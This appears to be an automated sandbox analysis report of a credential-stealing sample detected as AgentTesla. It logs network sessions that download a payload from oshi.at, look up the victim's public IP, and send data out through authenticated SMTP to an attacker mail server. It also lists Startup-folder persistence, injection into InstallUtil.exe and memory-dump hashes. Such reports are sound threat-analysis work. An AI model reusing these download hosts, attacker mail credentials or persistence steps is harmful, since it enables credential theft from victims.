2           192.168.2.6  61090        5.253.86.15     443               2736  C:\Users\user\Desktop\Ref#66001032.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-06 06:56:28 UTC  162                OUT        GET /YBbz HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                       Host: oshi.at


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.6  61092        5.253.86.15     443               2736  C:\Users\user\Desktop\Ref#66001032.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-06 06:56:53 UTC  162                OUT        GET /YBbz HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                       Host: oshi.at
2025-01-06 06:56:55 UTC  317                IN         HTTP/1.1 200 OK
                                                       Server: nginx
                                                       Date: Mon, 06 Jan 2025 06:56:55 GMT
                                                       Content-Type: application/octet-stream
                                                       Content-Length: 1223688
                                                       Connection: close
                                                       Last-Modified: Sun, 05 Jan 2025 23:17:21 GMT
                                                       Accept-Ranges: bytes
                                                       Content-Disposition: attachment; filename=AXGP.dat
                                                       ETag: "a6db55e686be5ecbf68d759d0c4a9c0f"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.6  61094        104.26.12.205   443               6932  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-06 06:57:13 UTC  155                OUT        GET / HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                       Host: api.ipify.org
                                                       Connection: Keep-Alive
2025-01-06 06:57:13 UTC  424                IN         HTTP/1.1 200 OK
                                                       Date: Mon, 06 Jan 2025 06:57:13 GMT
                                                       Content-Type: text/plain
                                                       Content-Length: 12
                                                       Connection: close
                                                       Vary: Origin
                                                       CF-Cache-Status: DYNAMIC
                                                       Server: cloudflare
                                                       CF-RAY: 8fd9d00afbe58c29-EWR
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1995&rtt_var=754&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1445544&cwnd=188&unsent_bytes=0&cid=cb2a3f0928f71f8b&ts=197&x=0"
2025-01-06 06:57:13 UTC  12                 IN         Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                       Data Ascii: 8.46.123.189


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.6  61106        5.253.86.15     443               1364  C:\Users\user\AppData\Roaming\Length.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-06 06:57:24 UTC  186                OUT        GET /YBbz HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                       Host: oshi.at
                                                       Connection: Keep-Alive
2025-01-06 06:57:25 UTC  317                IN         HTTP/1.1 200 OK
                                                       Server: nginx
                                                       Date: Mon, 06 Jan 2025 06:57:24 GMT
                                                       Content-Type: application/octet-stream
                                                       Content-Length: 1223688
                                                       Connection: close
                                                       Content-Disposition: attachment; filename=AXGP.dat
                                                       ETag: "a6db55e686be5ecbf68d759d0c4a9c0f"
                                                       Accept-Ranges: bytes
                                                       Last-Modified: Sun, 05 Jan 2025 23:17:21 GMT


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.6  61113        5.253.86.15     443               1364  C:\Users\user\AppData\Roaming\Length.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-06 06:58:39 UTC  162                OUT        GET /YBbz HTTP/1.1
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                       Host: oshi.at
2025-01-06 06:58:44 UTC  317                IN         HTTP/1.1 200 OK
                                                       Server: nginx
                                                       Date: Mon, 06 Jan 2025 06:58:44 GMT
                                                       Content-Type: application/octet-stream
                                                       Content-Length: 1223688
                                                       Connection: close
                                                       Last-Modified: Sun, 05 Jan 2025 23:17:21 GMT
                                                       Accept-Ranges: bytes
                                                       ETag: "a6db55e686be5ecbf68d759d0c4a9c0f"
                                                       Content-Disposition: attachment; filename=AXGP.dat


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 61114 | 5.253.86.15 | 443 | 1364 | C:\Users\user\AppData\Roaming\Length.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:58:55 UTC | 162 | OUT | GET /YBbz HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: oshi.at


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 61115 | 5.253.86.15 | 443 | 1364 | C:\Users\user\AppData\Roaming\Length.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:59:00 UTC | 162 | OUT | GET /YBbz HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: oshi.at


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 61116 | 5.253.86.15 | 443 | 1364 | C:\Users\user\AppData\Roaming\Length.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:59:04 UTC | 162 | OUT | GET /YBbz HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: oshi.at


Session ID | Source IP | Source Port | Destination IP | Destination Port
10 | 192.168.2.6 | 61117 | 5.253.86.15 | 443
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:59:08 UTC | 162 | OUT | GET /YBbz HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Host: oshi.at


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jan 6, 2025 07:57:14.933096886 CET | 587 | 61095 | 162.254.34.31 | 192.168.2.6 | 220 server1.educt.shop ESMTP Postfix
Jan 6, 2025 07:57:14.969300032 CET | 61095 | 587 | 192.168.2.6 | 162.254.34.31 | EHLO 992547
Jan 6, 2025 07:57:15.142016888 CET | 587 | 61095 | 162.254.34.31 | 192.168.2.6 | 250-server1.educt.shop
250-PIPELINING
250-SIZE 204800000
250-ETRN
250-STARTTLS
250-AUTH PLAIN LOGIN
250-AUTH=PLAIN LOGIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 CHUNKING
Jan 6, 2025 07:57:15.146552086 CET | 61095 | 587 | 192.168.2.6 | 162.254.34.31 | AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
Jan 6, 2025 07:57:15.318233013 CET | 587 | 61095 | 162.254.34.31 | 192.168.2.6 | 334 UGFzc3dvcmQ6
Jan 6, 2025 07:57:15.503103018 CET | 587 | 61095 | 162.254.34.31 | 192.168.2.6 | 235 2.7.0 Authentication successful
Jan 6, 2025 07:57:15.507781982 CET | 61095 | 587 | 192.168.2.6 | 162.254.34.31 | MAIL FROM:<sendxambro@educt.shop>
Jan 6, 2025 07:57:15.679544926 CET | 587 | 61095 | 162.254.34.31 | 192.168.2.6 | 250 2.1.0 Ok
Jan 6, 2025 07:57:15.681883097 CET | 61095 | 587 | 192.168.2.6 | 162.254.34.31 | RCPT TO:<ambro@educt.shop>
Jan 6, 2025 07:57:15.855175018 CET | 587 | 61095 | 162.254.34.31 | 192.168.2.6 | 250 2.1.5 Ok
Jan 6, 2025 07:57:15.855375051 CET | 61095 | 587 | 192.168.2.6 | 162.254.34.31 | DATA
Jan 6, 2025 07:57:16.026880026 CET | 587 | 61095 | 162.254.34.31 | 192.168.2.6 | 354 End data with <CR><LF>.<CR><LF>
Jan 6, 2025 07:57:16.027684927 CET | 61095 | 587 | 192.168.2.6 | 162.254.34.31 | .
Jan 6, 2025 07:57:16.320450068 CET | 587 | 61095 | 162.254.34.31 | 192.168.2.6 | 250 2.0.0 Ok: queued as BC2D16099A
Jan 6, 2025 07:58:54.316416979 CET | 61095 | 587 | 192.168.2.6 | 162.254.34.31 | QUIT
Jan 6, 2025 07:58:54.488742113 CET | 587 | 61095 | 162.254.34.31 | 192.168.2.6 | 221 2.0.0 Bye

                                                                                                Target ID:0
                                                                                                Start time:01:54:58
                                                                                                Start date:06/01/2025
                                                                                                Path:C:\Users\user\Desktop\Ref#66001032.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Ref#66001032.exe"
                                                                                                Imagebase:0x520000
                                                                                                File size:82'040 bytes
                                                                                                MD5 hash:74E7FAC7B65EF917CCF9A16A28E52663
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3526218119.0000000006420000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3486694329.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:5
                                                                                                Start time:01:57:09
                                                                                                Start date:06/01/2025
                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\excel_doc.xlsx"
                                                                                                Imagebase:0x890000
                                                                                                File size:53'161'064 bytes
                                                                                                MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:6
                                                                                                Start time:01:57:10
                                                                                                Start date:06/01/2025
                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                Imagebase:0x870000
                                                                                                File size:42'064 bytes
                                                                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4610997762.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4610997762.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4610997762.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4610997762.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:10
                                                                                                Start time:01:57:21
                                                                                                Start date:06/01/2025
                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs"
                                                                                                Imagebase:0x7ff739e70000
                                                                                                File size:170'496 bytes
                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:11
                                                                                                Start time:01:57:21
                                                                                                Start date:06/01/2025
                                                                                                Path:C:\Users\user\AppData\Roaming\Length.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Length.exe"
                                                                                                Imagebase:0xc40000
                                                                                                File size:82'040 bytes
                                                                                                MD5 hash:74E7FAC7B65EF917CCF9A16A28E52663
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 34%, ReversingLabs
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                Target ID:12
                                                                                                Start time:01:58:23
                                                                                                Start date:06/01/2025
                                                                                                Path:C:\Windows\splwow64.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\splwow64.exe 12288
                                                                                                Imagebase:0x7ff7dfc90000
                                                                                                File size:163'840 bytes
                                                                                                MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false


                                                                                                  Execution Graph

                                                                                                  Execution Coverage:13.5%
                                                                                                  Dynamic/Decrypted Code Coverage:97.5%
                                                                                                  Signature Coverage:1.9%
                                                                                                  Total number of Nodes:321
                                                                                                  Total number of Limit Nodes:13

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: jjjjjj
                                                                                                  • API String ID: 0-3900813449
                                                                                                  • Opcode ID: 81808e0ce580c23ad3959e8c61d2a323aa03f07510d9acc4b7d7b1501012ebf6
                                                                                                  • Instruction ID: fe13644612cc87e1876040dfe0994df94f334450fcfd3ec9df9deaaf17cba26b
                                                                                                  • Opcode Fuzzy Hash: 81808e0ce580c23ad3959e8c61d2a323aa03f07510d9acc4b7d7b1501012ebf6
                                                                                                  • Instruction Fuzzy Hash: 85E23A7A250510EFDB4A9F98D988D54BBB2FF4D32471A81D8F2099B236C732D861EF50

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 2
                                                                                                  • API String ID: 0-450215437
                                                                                                  • Opcode ID: 5c9d1e3071b44955e39613872cad5c07431fa18afb25d7c0e8018ad1f7b5dd69
                                                                                                  • Instruction ID: 619d7edc4f202def83a8c572bdfbac38daeabeaa152e6d709b6803a52d3c560c
                                                                                                  • Opcode Fuzzy Hash: 5c9d1e3071b44955e39613872cad5c07431fa18afb25d7c0e8018ad1f7b5dd69
                                                                                                  • Instruction Fuzzy Hash: 08E2B074A04628CFDBA5DF69DC84A9ABBF6FB89305F1081E9D909A7354DB305E81CF40
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4
                                                                                                  • API String ID: 0-4088798008
                                                                                                  • Opcode ID: 2f275899f0f8f9198e51ee90f98a724b21e22ab7178ed512dc11ad9439513b6d
                                                                                                  • Instruction ID: 2f2e027fc9c19dd698df78c112f004ba26347261bd175c04aac3f7ef5cf09598
                                                                                                  • Opcode Fuzzy Hash: 2f275899f0f8f9198e51ee90f98a724b21e22ab7178ed512dc11ad9439513b6d
                                                                                                  • Instruction Fuzzy Hash: F3B20B34A10219CFDB54DF94C994BADB7B6FF48300F5485A9E905AB3A5CBB0AD82CF50

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 8
                                                                                                  • API String ID: 0-4194326291
                                                                                                  • Opcode ID: e76970d853d4ee03eda1f7b1962f27d8b36dedbbbd2d9d3b19ab07e858dcca3a
                                                                                                  • Instruction ID: 4e00a33e62c48e65668b266d5971d228582c16cd87c78b16042bd1f1062d4b8b
                                                                                                  • Opcode Fuzzy Hash: e76970d853d4ee03eda1f7b1962f27d8b36dedbbbd2d9d3b19ab07e858dcca3a
                                                                                                  • Instruction Fuzzy Hash: AB52D575D016298FDBA4DF69CC50AD9B7B2FB89304F5082EAD519A7354DB30AE81CF40
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523890799.00000000062E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_62e0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 4
                                                                                                  • API String ID: 0-4088798008
                                                                                                  APIs
                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 056FF1CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  APIs
                                                                                                  • NtResumeThread.NTDLL(?,?), ref: 056FF1CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3524271343.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6310000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: h
                                                                                                  • API String ID: 0-2439710439
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3522559543.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61e0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3521313599.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61d0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3527049438.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_66a0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3512002675.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_56f0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3522559543.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61e0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3522559543.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_61e0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d8ab0803c7fe839da27ec0f7a16a18d8b7c46520f7b25835d181a0dfd133dce3
                                                                                                  • Instruction ID: 636b5dc478614557496234aef1afcd91f1465ab7501ab56627bc7cd063c157d2
                                                                                                  • Opcode Fuzzy Hash: d8ab0803c7fe839da27ec0f7a16a18d8b7c46520f7b25835d181a0dfd133dce3
                                                                                                  • Instruction Fuzzy Hash: 3D711770D00609CFDB48EF6AE84169EBBF2FFC8308F14C569D054AB269EB7419199F45
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3469350443.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_26c0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a4da2a5d3672b7ff9509b5aa73d7d5980ac222a961f4a93adee4e9325d71ed9
                                                                                                  • Instruction ID: f56c704092bc90336c17fe9c28e76e1deec8c0b8134f0de7e4f80a1ee291865f
                                                                                                  • Opcode Fuzzy Hash: 5a4da2a5d3672b7ff9509b5aa73d7d5980ac222a961f4a93adee4e9325d71ed9
                                                                                                  • Instruction Fuzzy Hash: 10710770E00609CFDB48EF6AE84169EBBF2FFC8309F14C569D014AB269EB7419199F45
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3527049438.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_66a0000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8046edce282da48cee158c455b6f8fb52a29ed8376b476bbe8bcebfbedd9803c
                                                                                                  • Instruction ID: 68390c688e77691487120b32fa6860e8eec4af36ad38e679db2ef562565d977a
                                                                                                  • Opcode Fuzzy Hash: 8046edce282da48cee158c455b6f8fb52a29ed8376b476bbe8bcebfbedd9803c
                                                                                                  • Instruction Fuzzy Hash: 6B510874E00219CFDB44DFAAD8846EEBBF2FF88300F149169D815A7364E77499828B94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 43e060fd8e5d337dc9d3d18b72b34c4737c7c47e8e1dee4e194f96e29dd9137b
                                                                                                  • Instruction ID: cd5fb274608b8402064410be95e70947284530b528459dd90b3e7521f5b0d02f
                                                                                                  • Opcode Fuzzy Hash: 43e060fd8e5d337dc9d3d18b72b34c4737c7c47e8e1dee4e194f96e29dd9137b
                                                                                                  • Instruction Fuzzy Hash: 10510A71E04A588BEB18CF6BCC4469ABBF3BFC9305F14C1A9D448AA259DB744A85CF50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.3523013759.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_6210000_Ref#66001032.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
